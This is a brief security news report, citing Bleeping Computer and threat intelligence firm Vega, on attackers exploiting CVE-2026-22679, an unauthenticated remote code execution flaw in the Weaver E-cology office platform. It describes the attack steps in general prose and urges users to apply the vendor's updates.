Hackers exploit critical Weaver E-cology vulnerability

Per Bleeping Computer, hackers have been actively exploiting a critical vulnerability, identified as CVE-2026-22679, in the Weaver E-cology office automation platform since mid-March. This exploitation began just five days after the software vendor released a patch for the issue and two weeks before its public disclosure.

Threat intelligence company Vega documented the attacks, which targeted organizations primarily in China that use Weaver E-cology for workflows, document management, and internal business processes. The critical unauthenticated remote code execution flaw stems from an exposed debug API endpoint that allows unvalidated, user-supplied parameters to reach backend Remote Procedure Call (RPC) functionality. Attackers used this to execute system commands, initially attempting discovery commands via ping and PowerShell downloads, which were blocked. They then tried to deploy an MSI installer, which also failed. Subsequently, they reverted to using obfuscated, fileless PowerShell scripts fetched remotely, executing reconnaissance commands like whoami and ipconfig.

Despite having remote code execution capabilities, the attackers did not establish persistent sessions. Users of Weaver E-cology 10.0 are strongly advised to apply the security updates provided by the vendor, as upgrading is the only recommended mitigation.

Source: Bleeping Computer